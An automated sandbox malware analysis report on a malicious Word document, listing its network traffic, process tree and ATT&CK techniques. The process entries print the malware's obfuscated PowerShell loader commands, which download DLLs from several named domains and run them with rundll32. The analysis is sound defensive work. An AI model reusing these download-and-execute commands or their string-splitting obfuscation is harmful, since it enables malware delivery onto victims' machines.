Sep 16, 2021 16:58:46.874319077 CEST	49171	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:47.280375004 CEST	49171	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:47.327146053 CEST	443	49171	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:47.455360889 CEST	443	49171	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:47.468300104 CEST	49171	443	192.168.2.22	204.11.58.87

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2021 16:58:41.087493896 CEST	52167	53	192.168.2.22	8.8.8.8
Sep 16, 2021 16:58:41.089656115 CEST	50591	53	192.168.2.22	8.8.8.8
Sep 16, 2021 16:58:41.100579977 CEST	57805	53	192.168.2.22	8.8.8.8
Sep 16, 2021 16:58:41.124824047 CEST	53	52167	8.8.8.8	192.168.2.22
Sep 16, 2021 16:58:41.124838114 CEST	53	50591	8.8.8.8	192.168.2.22
Sep 16, 2021 16:58:41.128401995 CEST	53	57805	8.8.8.8	192.168.2.22
Sep 16, 2021 16:58:45.084772110 CEST	59030	53	192.168.2.22	8.8.8.8
Sep 16, 2021 16:58:45.120867968 CEST	53	59030	8.8.8.8	192.168.2.22
Sep 16, 2021 16:58:46.286663055 CEST	59185	53	192.168.2.22	8.8.8.8
Sep 16, 2021 16:58:46.313405037 CEST	53	59185	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 16, 2021 16:58:41.087493896 CEST	192.168.2.22	8.8.8.8	0xe85f	Standard query (0)	srdm.in	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:41.089656115 CEST	192.168.2.22	8.8.8.8	0x4dc2	Standard query (0)	gvmedicine.com	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:41.100579977 CEST	192.168.2.22	8.8.8.8	0x74ab	Standard query (0)	scriptcaseblog.com.br	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:45.084772110 CEST	192.168.2.22	8.8.8.8	0xf2b6	Standard query (0)	sharayuprakashan.com	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:46.286663055 CEST	192.168.2.22	8.8.8.8	0x4129	Standard query (0)	venturefiling.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 16, 2021 16:58:41.124824047 CEST	8.8.8.8	192.168.2.22	0xe85f	No error (0)	srdm.in	192.185.115.199	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:41.124838114 CEST	8.8.8.8	192.168.2.22	0x4dc2	No error (0)	gvmedicine.com	204.11.58.87	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:41.128401995 CEST	8.8.8.8	192.168.2.22	0x74ab	No error (0)	scriptcaseblog.com.br	149.56.235.225	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:45.120867968 CEST	8.8.8.8	192.168.2.22	0xf2b6	No error (0)	sharayuprakashan.com	204.11.58.87	A (IP address)	IN (0x0001)
Sep 16, 2021 16:58:46.313405037 CEST	8.8.8.8	192.168.2.22	0x4129	No error (0)	venturefiling.com	204.11.58.87	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gvmedicine.com

scriptcaseblog.com.br

srdm.in

sharayuprakashan.com

venturefiling.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49168	204.11.58.87	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-16 14:58:41 UTC	0	OUT	GET /c8lDPI7K/ca.html HTTP/1.1 Host: gvmedicine.com Connection: Keep-Alive
2021-09-16 14:58:42 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 16 Sep 2021 14:58:42 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 X-Server-Cache: true X-Proxy-Cache: HIT Accept-Ranges: none Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49169	149.56.235.225	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-16 14:58:42 UTC	0	OUT	GET /8KhqnNaE4UB/ca.html HTTP/1.1 Host: scriptcaseblog.com.br Connection: Keep-Alive
2021-09-16 14:58:44 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 16 Sep 2021 14:58:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.23 Cache-Control: max-age=0, no-cache X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Nginx-Upstream-Cache-Status: MISS X-Server-Powered-By: Scriptcase

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	192.185.115.199	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-16 14:58:42 UTC	0	OUT	GET /0K6dTttd/ca.html HTTP/1.1 Host: srdm.in Connection: Keep-Alive
2021-09-16 14:58:42 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 16 Sep 2021 14:58:42 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Server-Cache: true X-Proxy-Cache: HIT

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	204.11.58.87	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-16 14:58:45 UTC	0	OUT	GET /90qJEVeD0VAw/ca.html HTTP/1.1 Host: sharayuprakashan.com Connection: Keep-Alive
2021-09-16 14:58:46 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 16 Sep 2021 14:58:46 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 X-Server-Cache: true X-Proxy-Cache: HIT Accept-Ranges: none Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	204.11.58.87	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-16 14:58:47 UTC	1	OUT	GET /yP2brxfli/ca.html HTTP/1.1 Host: venturefiling.com Connection: Keep-Alive
2021-09-16 14:58:47 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 16 Sep 2021 14:58:47 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 X-Server-Cache: true X-Proxy-Cache: HIT Accept-Ranges: none Content-Length: 0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2564 Parent PID: 596

General

Start time:	16:58:18
Start date:	16/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fb10000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 3040 Parent PID: 2564

General

Start time:	16:58:22
Start date:	16/09/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /k cscript.exe C:\ProgramData\pin.vbs
Imagebase:	0x4a3f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cscript.exe PID: 3052 Parent PID: 3040

General

Start time:	16:58:22
Start date:	16/09/2021
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\ProgramData\pin.vbs
Imagebase:	0xfff00000
File size:	156160 bytes
MD5 hash:	ECB021CA3370582F0C7244B0CF06732C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 1348 Parent PID: 3052

General

Start time:	16:58:28
Start date:	16/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Imagebase:	0x13fe00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2180 Parent PID: 3052

General

Start time:	16:58:29
Start date:	16/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Imagebase:	0x13fe00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2676 Parent PID: 3052

General

Start time:	16:58:30
Start date:	16/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Imagebase:	0x13fe00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2624 Parent PID: 3052

General

Start time:	16:58:30
Start date:	16/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Imagebase:	0x13fe00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exe PID: 2184 Parent PID: 3052

General

Start time:	16:58:31
Start date:	16/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Imagebase:	0x13fe00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: cmd.exe PID: 2596 Parent PID: 3052

General

Start time:	16:58:47
Start date:	16/09/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www1.dll,ldr
Imagebase:	0x4a3f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 448 Parent PID: 3052

General

Start time:	16:58:47
Start date:	16/09/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www2.dll,ldr
Imagebase:	0x4a3f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 1296 Parent PID: 2596

General

Start time:	16:58:48
Start date:	16/09/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\ProgramData\www1.dll,ldr
Imagebase:	0xfff20000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 2248 Parent PID: 3052

General

Start time:	16:58:48
Start date:	16/09/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www3.dll,ldr
Imagebase:	0x4a3f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 2676 Parent PID: 448

General

Start time:	16:58:48
Start date:	16/09/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\ProgramData\www2.dll,ldr
Imagebase:	0xfff20000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 1532 Parent PID: 3052

General

Start time:	16:58:48
Start date:	16/09/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www4.dll,ldr
Imagebase:	0x4a3f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 1712 Parent PID: 2248

General

Start time:	16:58:49
Start date:	16/09/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\ProgramData\www3.dll,ldr
Imagebase:	0xfff20000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 2628 Parent PID: 3052

General

Start time:	16:58:49
Start date:	16/09/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www5.dll,ldr
Imagebase:	0x4a3f0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 2928 Parent PID: 1532

General

Start time:	16:58:49
Start date:	16/09/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\ProgramData\www4.dll,ldr
Imagebase:	0xfff20000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 2396 Parent PID: 2628

General

Start time:	16:58:50
Start date:	16/09/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\ProgramData\www5.dll,ldr
Imagebase:	0xfff20000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques.
Tactics:	Defense Evasion
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report diagram-884.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "diagram-884.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Form.frm, Stream Size: 6655

General

VBA Code

VBA File Name: Module1.vba, Stream Size: 15671

General

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 1593

General

VBA Code

VBA File Name: bxh.vba, Stream Size: 2961

General

VBA Code

Streams